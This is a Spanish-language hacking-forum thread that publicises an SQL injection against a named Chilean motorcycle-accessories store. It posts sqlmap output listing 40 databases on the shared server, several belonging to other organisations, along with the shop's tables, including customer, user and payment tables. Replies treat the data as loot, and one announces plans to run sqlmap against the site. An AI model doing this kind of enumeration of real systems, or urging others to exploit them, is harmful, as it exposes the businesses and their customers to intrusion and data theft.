[SQLi] http://www.procircuit.cl

Iniciado por rreedd, Julio 04, 2016, 09:03:00 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario
Julio 04, 2016, 09:03:00 PM

Sitio : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Descripción Del Sitio : Venta de artículos y accesorios para motociclistas

[SQLi] Inyección en URL


Descripción de la inyección : es una inyección muy básica pero no por eso la vulnerabilidad deja de ser peligrosa, ya que expone todas las bases de datos alojadas en el servidor.

Url del sitio :  No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Xploit :  No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Reportado : SI (hace mas de 1 mes y aun no la reparan así que no creo que lo hagan)

Después de unos momentos de Sqlmap  ;)



Listado de las db alojadas en el servidor
Código: php

available databases [40]:
      [*] admin_prueba
      [*] AirCloud
      [*] AirCloud_M
      [*] AirCloud_Soporte
      [*] BD_CLAZO
      [*] BD_Procircuit2015
      [*] BDdes1
      [*] BDPREL2
      [*] bea_profile_management
      [*] BibliotecaElecmetal
      [*] Britanico2
      [*] Britanico_Eng
      [*] datacenter
      [*] DirectoPro_db2
      [*] GORILACONTROL
      [*] iia_db_encuesta
      [*] iia_elecmetal_cl
      [*] INDISA_WFLOW
      [*] ingles
      [*] localhost
      [*] master
      [*] model
      [*] moscoso_cl_1
      [*] msdb
      [*] pide
      [*] plataforma
      [*] prueba2
      [*] psa
      [*] ReportServer
      [*] ReportServerTempDB
      [*] sitebuilderAFE1A86606277534FBE47ED6219A39AF
      [*] soporte_
      [*] soporte_1
      [*] soporte_indisa
      [*] soporte_prueba
      [*] soporte_pruebas
      [*] soporte_test
      [*] tempdb
      [*] Traspaso
      [*] traspaso 2 prueba



Tablas de la db de la pagina BD_Procircuit2015
Código: php


+------------------------------------------------+
| cal_user_procircuit.PC_ALCPOPUP                |
| cal_user_procircuit.PC_ALCUSER                 |
| cal_user_procircuit.PC_CATEGMENU               |
| cal_user_procircuit.pc_Noticia                 |
| cal_user_procircuit.pc_SemiNuevas_Cotizacion   |
| cal_user_procircuit.pc_aplicacion              |
| cal_user_procircuit.pc_busqueda                |
| cal_user_procircuit.pc_carro                   |
| cal_user_procircuit.pc_categoria               |
| cal_user_procircuit.pc_clasificacion           |
| cal_user_procircuit.pc_cliente                 |
| cal_user_procircuit.pc_contacto                |
| cal_user_procircuit.pc_cotizacion              |
| cal_user_procircuit.pc_cotizacion_item         |
| cal_user_procircuit.pc_cotizacion_movimiento   |
| cal_user_procircuit.pc_estado_cotizacion       |
| cal_user_procircuit.pc_estado_orden_compra     |
| cal_user_procircuit.pc_estado_pago             |
| cal_user_procircuit.pc_galeria                 |
| cal_user_procircuit.pc_marca                   |
| cal_user_procircuit.pc_motivo_no_pago          |
| cal_user_procircuit.pc_orden_compra            |
| cal_user_procircuit.pc_orden_compra_item       |
| cal_user_procircuit.pc_orden_compra_movimiento |
| cal_user_procircuit.pc_perfil                  |
| cal_user_procircuit.pc_perfil_aplicacion       |
| cal_user_procircuit.pc_producto                |
| cal_user_procircuit.pc_producto_busqueda       |
| cal_user_procircuit.pc_producto_contacto       |
| cal_user_procircuit.pc_producto_relacionado    |
| cal_user_procircuit.pc_promocion               |
| cal_user_procircuit.pc_repuesto                |
| cal_user_procircuit.pc_segmento                |
| cal_user_procircuit.pc_subcategoria            |
| cal_user_procircuit.pc_sucursal                |
| cal_user_procircuit.pc_usuario                 |
+------------------------------------------------+


No busque mas vulnerabilidades en la pagina, pero estoy seguro que tienen que existir mas  ;D

Autor: RREEDD

Saludos desde Chile
Julio 05, 2016, 04:54:10 PM #1
Buen descubrimiento @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, tienen muchas BDs, seguro que hay varias con información interesante ^^

Saludos.


Julio 05, 2016, 06:16:44 PM #2
Abriendo sqlmap en 3..2..1..
Imprimir
Ir Arriba Páginas1
Acciones del Usuario